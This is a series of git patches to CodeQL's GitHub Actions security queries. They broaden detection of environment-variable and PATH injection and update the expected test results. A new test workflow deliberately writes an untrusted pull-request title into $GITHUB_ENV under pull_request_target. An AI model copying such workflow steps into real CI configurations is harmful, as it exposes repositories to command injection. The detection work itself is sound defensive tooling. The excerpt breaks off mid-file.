a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index 57efc8af35d..5f4ba7a7b98 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected @@ -313,6 +313,7 @@ edges | .github/workflows/workflow_run_untrusted_checkout.yml:13:9:16:6 | Uses Step | .github/workflows/workflow_run_untrusted_checkout.yml:16:9:18:31 | Uses Step | #select | .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | Potential unsafe checkout of untrusted code on a privileged workflow. | +| .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | Potential unsafe checkout of untrusted code on a privileged workflow. | | .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | Potential unsafe checkout of untrusted code on a privileged workflow. | | .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | Potential unsafe checkout of untrusted code on a privileged workflow. | | .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | .github/workflows/gitcheckout.yml:10:11:18:8 | Run Step | .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | Potential unsafe checkout of untrusted code on a privileged workflow. | From 40a6f3bbee8348d2b2f0e66b510236bcd91b1ec7 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 27 Jun 2024 22:53:55 +0200 Subject: [PATCH 0367/1267] Make EnvVar and Path injection equivalent --- .../security/EnvPathInjectionQuery.qll | 5 ++- .../actions/security/EnvVarInjectionQuery.qll | 39 ++++++++++++------- 2 files changed, 29 insertions(+), 15 deletions(-) diff --git a/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll index cd049cccf4e..453966f0101 100644 --- a/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll @@ -15,7 +15,8 @@ class EnvPathInjectionFromFileReadSink extends EnvPathInjectionSink { writeToGitHubPath(run, value) and // (eg: echo DATABASE_SHA=`yq '.creationMetadata.sha' codeql-database.yml` >> $GITHUB_ENV) value - .regexpMatch(["\\$\\(", "`"] + ["cat\\s+", "<", "jq\\s+", "yq\\s+"] + ".*" + ["`", "\\)"]) + .regexpMatch(["\\$\\(", "`"] + + ["cat\\s+", "<", "jq\\s+", "yq\\s+", "tail\\s+", "head\\s+"] + ".*" + ["`", "\\)"]) ) } } @@ -31,7 +32,7 @@ class EnvPathInjectionFromFileReadSink extends EnvPathInjectionSink { class EnvPathInjectionFromEnvVarSink extends EnvPathInjectionSink { EnvPathInjectionFromEnvVarSink() { exists(Run run, Expression expr, string var_name, string value | - this.asExpr().getInScopeEnvVarExpr(var_name) = expr and + run.getInScopeEnvVarExpr(var_name) = expr and run.getScriptScalar() = this.asExpr() and writeToGitHubPath(run, value) and ( diff --git a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll index a692c6e5874..a78963086e1 100644 --- a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll @@ -7,18 +7,6 @@ import codeql.actions.DataFlow abstract class EnvVarInjectionSink extends DataFlow::Node { } -class EnvVarInjectionFromEnvVarSink extends EnvVarInjectionSink { - EnvVarInjectionFromEnvVarSink() { - exists(Run run, Expression expr, string var_name, string content, string value | - expr = run.getInScopeEnvVarExpr(var_name) and - writeToGitHubEnv(run, content) and - extractVariableAndValue(content, _, value) and - run.getScriptScalar() = this.asExpr() and - value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") - ) - } -} - class EnvVarInjectionFromFileReadSink extends EnvVarInjectionSink { EnvVarInjectionFromFileReadSink() { exists(Run run, UntrustedArtifactDownloadStep step, string content, string value | @@ -28,7 +16,32 @@ class EnvVarInjectionFromFileReadSink extends EnvVarInjectionSink { extractVariableAndValue(content, _, value) and // (eg: echo DATABASE_SHA=`yq '.creationMetadata.sha' codeql-database.yml` >> $GITHUB_ENV) value - .regexpMatch(["\\$\\(", "`"] + ["cat\\s+", "<", "jq\\s+", "yq\\s+"] + ".*" + ["`", "\\)"]) + .regexpMatch(["\\$\\(", "`"] + + ["cat\\s+", "<", "jq\\s+", "yq\\s+", "tail\\s+", "head\\s+"] + ".*" + ["`", "\\)"]) + ) + } +} + +/** + * Holds if a Run step declares an environment variable, uses it to declare env var. + * e.g. + * env: + * BODY: ${{ github.event.comment.body }} + * run: | + * echo "FOO=$BODY" >> $GITHUB_ENV + */ +class EnvVarInjectionFromEnvVarSink extends EnvVarInjectionSink { + EnvVarInjectionFromEnvVarSink() { + exists(Run run, Expression expr, string var_name, string content, string value | + run.getInScopeEnvVarExpr(var_name) = expr and + run.getScriptScalar() = this.asExpr() and + writeToGitHubEnv(run, content) and + extractVariableAndValue(content, _, value) and + ( + value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") + or + value.matches("$(echo %") and value.indexOf(var_name) > 0 + ) ) } } From a485528ebe2eb2f0ca7be747f38ac559edc4fb89 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 28 Jun 2024 12:31:43 +0200 Subject: [PATCH 0368/1267] Refactor bash script parsing to improve coverage of env var injection --- ql/lib/codeql/actions/Helper.qll | 11 +++ ql/lib/codeql/actions/dataflow/FlowSteps.qll | 92 +++++++++++++++---- .../security/EnvPathInjectionQuery.qll | 27 +++--- .../actions/security/EnvVarInjectionQuery.qll | 29 +++--- .../actions/security/PoisonableSteps.qll | 16 ++-- ql/lib/ext/config/poisonable_steps.yml | 12 +-- .../CWE-077/.github/workflows/test6.yml | 28 ++++++ .../CWE-077/EnvVarInjectionCritical.expected | 12 +++ .../CWE-077/EnvVarInjectionMedium.expected | 9 ++ 9 files changed, 172 insertions(+), 64 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-077/.github/workflows/test6.yml diff --git a/ql/lib/codeql/actions/Helper.qll b/ql/lib/codeql/actions/Helper.qll index 401ba89eca7..72dc7bf1687 100644 --- a/ql/lib/codeql/actions/Helper.qll +++ b/ql/lib/codeql/actions/Helper.qll @@ -235,3 +235,14 @@ predicate inNonPrivilegedJob(AstNode node) { not j.isPrivilegedExternallyTriggerable() ) } + +bindingset[snippet] +predicate outputsPartialFileContent(string snippet) { + // e.g. + // echo FOO=`yq '.foo' foo.yml` >> $GITHUB_ENV + // echo "FOO=$(> $GITHUB_ENV + // yq '.foo' foo.yml >> $GITHUB_PATH + // cat foo.txt >> $GITHUB_PATH + snippet + .regexpMatch(["(\\$\\(|`)<.*", ".*(\\b|^|\\s+)" + ["cat\\s+", "jq\\s+", "yq\\s+", "tail\\s+", "head\\s+", "ls\\s+"] + ".*"]) +} diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index 4f4d80cc11b..caa09e9c7e2 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll @@ -23,6 +23,60 @@ class AdditionalTaintStep extends Unit { abstract predicate step(DataFlow::Node node1, DataFlow::Node node2); } +/** + * Holds if an env var is passed to a Run step and this Run step, writes its value to a special workflow file. + * - file is the name of the special workflow file: GITHUB_ENV, GITHUB_OUTPUT, GITHUB_PATH + * - var_name is the name of the env var + * - run is the Run step + * - key is the name assigned in the special workflow file. + * e.g. FOO for `echo "FOO=$BODY" >> $GITHUB_ENV` + * e.g. FOO for `echo "FOO=$(echo $BODY)" >> $GITHUB_OUTPUT` + * e.g. path (special name) for `echo "$BODY" >> $GITHUB_PATH` + */ +bindingset[var_name] +predicate envToRunFlow(string file, string var_name, Run run, string key) { + exists(string content, string value | + ( + file = "GITHUB_ENV" and + writeToGitHubEnv(run, content) and + extractVariableAndValue(content, key, value) + or + file = "GITHUB_OUTPUT" and + writeToGitHubOutput(run, content) and + extractVariableAndValue(content, key, value) + or + file = "GITHUB_PATH" and + writeToGitHubPath(run, content) and + key = "path" and + value = content + ) and + ( + // e.g. echo "FOO=$BODY" >> $GITHUB_ENV + // e.g. echo "FOO=${BODY}" >> $GITHUB_ENV + value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") + or + // e.g. echo "FOO=$(echo $BODY)" >> $GITHUB_ENV + value.matches("$(echo %") and value.indexOf(var_name) > 0 + or + // e.g. + // FOO=$(echo $BODY) + // echo "FOO=$FOO" >> $GITHUB_ENV + exists(string line, string var2_name, string var2_value | + run.getScript().splitAt("\n") = line + | + var2_name = line.regexpCapture("([a-zA-Z0-9\\-_]+)=(.*)", 1) and + var2_value = line.regexpCapture("([a-zA-Z0-9\\-_]+)=(.*)", 2) and + var2_value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") and + ( + value.matches("%$" + ["", "{", "ENV{"] + var2_name + "%") + or + value.matches("$(echo %") and value.indexOf(var2_name) > 0 + ) + ) + ) + ) +} + /** * Holds if a Run step declares an environment variable, uses it in its script to set another env var. * e.g. @@ -32,20 +86,10 @@ class AdditionalTaintStep extends Unit { * echo "foo=$(echo $BODY)" >> $GITHUB_ENV */ predicate envToRunStep(DataFlow::Node pred, DataFlow::Node succ) { - exists(Run run, string var_name, string content, string value | + exists(Run run, string var_name | run.getInScopeEnvVarExpr(var_name) = pred.asExpr() and - succ.asExpr() = run.getScriptScalar() - | - ( - writeToGitHubEnv(run, content) or - writeToGitHubOutput(run, content) - ) and - extractVariableAndValue(content, _, value) and - value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") - or - writeToGitHubPath(run, content) and - value = content and - value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") + succ.asExpr() = run.getScriptScalar() and + envToRunFlow(["GITHUB_ENV", "GITHUB_PATH"], var_name, run, _) ) } @@ -63,16 +107,26 @@ predicate envToRunStep(DataFlow::Node pred, DataFlow::Node succ) { * echo "::set-output name=step-output::$BODY" */ predicate envToOutputStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { - exists(Run run, string var_name, string content, string key, string value | - writeToGitHubOutput(run, content) and - extractVariableAndValue(content, key, value) and - c = any(DataFlow::FieldContent ct | ct.getName() = key) and - pred.asExpr() = run.getInScopeEnvVarExpr(var_name) and + exists(Run run, string var_name, string key | + run.getInScopeEnvVarExpr(var_name) = pred.asExpr() and succ.asExpr() = run and - value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") + envToRunFlow("GITHUB_OUTPUT", var_name, run, key) and + c = any(DataFlow::FieldContent ct | ct.getName() = key) ) } +// predicate dISABLEDenvToOutputStoreStep( +// DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c +// ) { +// exists(Run run, string var_name, string content, string key, string value | +// writeToGitHubOutput(run, content) and +// extractVariableAndValue(content, key, value) and +// c = any(DataFlow::FieldContent ct | ct.getName() = key) and +// pred.asExpr() = run.getInScopeEnvVarExpr(var_name) and +// succ.asExpr() = run and +// value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") +// ) +// } predicate envToEnvStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { exists(Run run, string var_name, string content, string key, string value | writeToGitHubEnv(run, content) and diff --git a/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll index 453966f0101..cbdf9a917ce 100644 --- a/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll @@ -1,22 +1,26 @@ private import actions private import codeql.actions.TaintTracking private import codeql.actions.dataflow.ExternalFlow -import codeql.actions.dataflow.FlowSources private import codeql.actions.security.ArtifactPoisoningQuery +private import codeql.actions.dataflow.FlowSteps import codeql.actions.DataFlow +import codeql.actions.dataflow.FlowSources abstract class EnvPathInjectionSink extends DataFlow::Node { } +/** + * Holds if a Run step declares a PATH environment variable with contents from a local file. + * e.g. + * run: | + * cat foo.txt >> $GITHUB_PATH + */ class EnvPathInjectionFromFileReadSink extends EnvPathInjectionSink { EnvPathInjectionFromFileReadSink() { exists(Run run, UntrustedArtifactDownloadStep step, string value | this.asExpr() = run.getScriptScalar() and step.getAFollowingStep() = run and writeToGitHubPath(run, value) and - // (eg: echo DATABASE_SHA=`yq '.creationMetadata.sha' codeql-database.yml` >> $GITHUB_ENV) - value - .regexpMatch(["\\$\\(", "`"] + - ["cat\\s+", "<", "jq\\s+", "yq\\s+", "tail\\s+", "head\\s+"] + ".*" + ["`", "\\)"]) + outputsPartialFileContent(value) ) } } @@ -31,15 +35,10 @@ class EnvPathInjectionFromFileReadSink extends EnvPathInjectionSink { */ class EnvPathInjectionFromEnvVarSink extends EnvPathInjectionSink { EnvPathInjectionFromEnvVarSink() { - exists(Run run, Expression expr, string var_name, string value | - run.getInScopeEnvVarExpr(var_name) = expr and - run.getScriptScalar() = this.asExpr() and - writeToGitHubPath(run, value) and - ( - value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") - or - value.matches("$(echo %") and value.indexOf(var_name) > 0 - ) + exists(Run run, string var_name | + envToRunFlow("GITHUB_PATH", var_name, run, _) and + exists(run.getInScopeEnvVarExpr(var_name)) and + run.getScriptScalar() = this.asExpr() ) } } diff --git a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll index a78963086e1..5a3dbebc512 100644 --- a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll @@ -1,12 +1,20 @@ private import actions private import codeql.actions.TaintTracking private import codeql.actions.dataflow.ExternalFlow -import codeql.actions.dataflow.FlowSources private import codeql.actions.security.ArtifactPoisoningQuery +private import codeql.actions.dataflow.FlowSteps import codeql.actions.DataFlow +import codeql.actions.dataflow.FlowSources abstract class EnvVarInjectionSink extends DataFlow::Node { } +/** + * Holds if a Run step declares an environment variable with contents from a local file. + * e.g. + * run: | + * echo "sha=$(cat test-results/sha-number)" >> $GITHUB_ENV + * echo "sha=$(> $GITHUB_ENV + */ class EnvVarInjectionFromFileReadSink extends EnvVarInjectionSink { EnvVarInjectionFromFileReadSink() { exists(Run run, UntrustedArtifactDownloadStep step, string content, string value | @@ -14,10 +22,7 @@ class EnvVarInjectionFromFileReadSink extends EnvVarInjectionSink { step.getAFollowingStep() = run and writeToGitHubEnv(run, content) and extractVariableAndValue(content, _, value) and - // (eg: echo DATABASE_SHA=`yq '.creationMetadata.sha' codeql-database.yml` >> $GITHUB_ENV) - value - .regexpMatch(["\\$\\(", "`"] + - ["cat\\s+", "<", "jq\\s+", "yq\\s+", "tail\\s+", "head\\s+"] + ".*" + ["`", "\\)"]) + outputsPartialFileContent(value) ) } } @@ -32,16 +37,10 @@ class EnvVarInjectionFromFileReadSink extends EnvVarInjectionSink { */ class EnvVarInjectionFromEnvVarSink extends EnvVarInjectionSink { EnvVarInjectionFromEnvVarSink() { - exists(Run run, Expression expr, string var_name, string content, string value | - run.getInScopeEnvVarExpr(var_name) = expr and - run.getScriptScalar() = this.asExpr() and - writeToGitHubEnv(run, content) and - extractVariableAndValue(content, _, value) and - ( - value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") - or - value.matches("$(echo %") and value.indexOf(var_name) > 0 - ) + exists(Run run, string var_name | + envToRunFlow("GITHUB_ENV", var_name, run, _) and + exists(run.getInScopeEnvVarExpr(var_name)) and + run.getScriptScalar() = this.asExpr() ) } } diff --git a/ql/lib/codeql/actions/security/PoisonableSteps.qll b/ql/lib/codeql/actions/security/PoisonableSteps.qll index d9978b2a423..4165df17a4d 100644 --- a/ql/lib/codeql/actions/security/PoisonableSteps.qll +++ b/ql/lib/codeql/actions/security/PoisonableSteps.qll @@ -18,7 +18,7 @@ class PoisonableCommandStep extends PoisonableStep, Run { PoisonableCommandStep() { exists(string regexp | poisonableCommandsDataModel(regexp) and - exists(this.getScript().splitAt("\n").trim().regexpFind("([^a-z]|^)" + regexp, _, _)) + exists(this.getScript().splitAt("\n").trim().regexpFind("(^|\\b|\\s+)" + regexp, _, _)) ) } } @@ -29,7 +29,7 @@ class LocalScriptExecutionRunStep extends PoisonableStep, Run { LocalScriptExecutionRunStep() { exists(string line, string regexp, int group | line = this.getScript().splitAt("\n").trim() | poisonableLocalScriptsDataModel(regexp, group) and - cmd = line.regexpCapture(regexp, group) + cmd = line.regexpCapture("(^|\\b|\\s+)" + regexp, group) ) } @@ -40,16 +40,12 @@ class LocalActionUsesStep extends PoisonableStep, UsesStep { LocalActionUsesStep() { this.getCallee().matches("./%") } } -class EnvVarInjectionRunStep extends PoisonableStep, Run { - EnvVarInjectionRunStep() { - exists(string content, string value | - // Heuristic: - // Run step with env var definition based on file content. - // eg: `echo "sha=$(cat test-results/sha-number)" >> $GITHUB_ENV` - // eg: `echo "sha=$(> $GITHUB_ENV` +class EnvVarInjectionFromFileReadRunStep extends PoisonableStep, Run { + EnvVarInjectionFromFileReadRunStep() { + exists(string content, string value| writeToGitHubEnv(this, content) and extractVariableAndValue(content, _, value) and - value.matches("%" + ["ls ", "cat ", "jq ", "$(<"] + "%") + outputsPartialFileContent(value) ) } } diff --git a/ql/lib/ext/config/poisonable_steps.yml b/ql/lib/ext/config/poisonable_steps.yml index 11f17ae2623..dc835e7dab2 100644 --- a/ql/lib/ext/config/poisonable_steps.yml +++ b/ql/lib/ext/config/poisonable_steps.yml @@ -54,10 +54,10 @@ extensions: extensible: poisonableLocalScriptsDataModel data: # TODO: It could also be in the form of `dir/cmd` - - ["(^|;\\s*|\\s+)(\\.\\/)(.*)(\\s+|;|$)", 3] - - ["(^|;\\s*|\\s+)(source|sh|bash|zsh|fish)\\s+(.*)(\\s+|;|$)", 3] - - ["(^|;\\s*|\\s+)(node)\\s+(.*)(\\.js|\\.ts)(\\s+|;|$)", 3] - - ["(^|;\\s*|\\s+)(python)\\s+(.*)\\.py(\\s+|;|$)", 3] - - ["(^|;\\s*|\\s+)(ruby)\\s+(.*)\\.rb(\\s+|;|$)", 3] - - ["(^|;\\s*|\\s+)(go)\\s+(.*)\\.go(\\s+|;|$)", 3] + - ["(\\.\\/)(.*)(\\s+|;|$)", 3] + - ["(source|sh|bash|zsh|fish)\\s+(.*)(\\s+|;|$)", 3] + - ["(node)\\s+(.*)(\\.js|\\.ts)(\\s+|;|$)", 3] + - ["(python)\\s+(.*)\\.py(\\s+|;|$)", 3] + - ["(ruby)\\s+(.*)\\.rb(\\s+|;|$)", 3] + - ["(go)\\s+(.*)\\.go(\\s+|;|$)", 3] diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test6.yml b/ql/test/query-tests/Security/CWE-077/.github/workflows/test6.yml new file mode 100644 index 00000000000..36340258515 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-077/.github/workflows/test6.yml @@ -0,0 +1,28 @@ +name: Test + +on: + pull_request_target: + +jobs: + test: + runs-on: ubuntu-latest + steps: + - env: + TITLE: ${{ github.event.pull_request.title }} + run: | + FOO=${TITLE##*/} + echo PR_TITLE=${FOO} >> $GITHUB_ENV + - env: + TITLE: ${{ github.event.pull_request.title }} + run: | + FOO=$TITLE+ + echo PR_TITLE=$FOO >> $GITHUB_ENV + - env: + TITLE: ${{ github.event.pull_request.title }} + run: | + venv="$(echo $TITLE)')" + echo "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV + + + + diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected index 0dbff955318..9c2fd6faf46 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected @@ -11,6 +11,9 @@ edges | .github/workflows/test4.yml:57:27:57:64 | github.event.pull_request.title | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | provenance | | | .github/workflows/test4.yml:60:19:60:56 | github.event.pull_request.title | .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | provenance | | | .github/workflows/test5.yml:10:9:30:6 | Uses Step | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | provenance | | +| .github/workflows/test6.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test6.yml:12:14:14:46 | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | provenance | | +| .github/workflows/test6.yml:16:19:16:56 | github.event.pull_request.title | .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | provenance | | +| .github/workflows/test6.yml:21:19:21:56 | github.event.pull_request.title | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | provenance | | nodes | .github/workflows/test2.yml:12:9:41:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | semmle.label | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | @@ -36,6 +39,12 @@ nodes | .github/workflows/test4.yml:60:19:60:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/test5.yml:10:9:30:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | semmle.label | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | +| .github/workflows/test6.yml:11:19:11:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test6.yml:12:14:14:46 | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | semmle.label | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | +| .github/workflows/test6.yml:16:19:16:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | semmle.label | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | +| .github/workflows/test6.yml:21:19:21:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | semmle.label | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | subpaths #select | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | .github/workflows/test2.yml:12:9:41:6 | Uses Step | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | @@ -50,3 +59,6 @@ subpaths | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | .github/workflows/test4.yml:57:27:57:64 | github.event.pull_request.title | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | | .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | .github/workflows/test4.yml:60:19:60:56 | github.event.pull_request.title | .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | .github/workflows/test5.yml:10:9:30:6 | Uses Step | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | +| .github/workflows/test6.yml:12:14:14:46 | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | .github/workflows/test6.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test6.yml:12:14:14:46 | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test6.yml:12:14:14:46 | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | +| .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | .github/workflows/test6.yml:16:19:16:56 | github.event.pull_request.title | .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | +| .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | .github/workflows/test6.yml:21:19:21:56 | github.event.pull_request.title | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected index 5641ea53afd..7ea9865c70a 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected @@ -11,6 +11,9 @@ edges | .github/workflows/test4.yml:57:27:57:64 | github.event.pull_request.title | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | provenance | | | .github/workflows/test4.yml:60:19:60:56 | github.event.pull_request.title | .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | provenance | | | .github/workflows/test5.yml:10:9:30:6 | Uses Step | .github/workflows/test5.yml:33:14:36:62 | echo 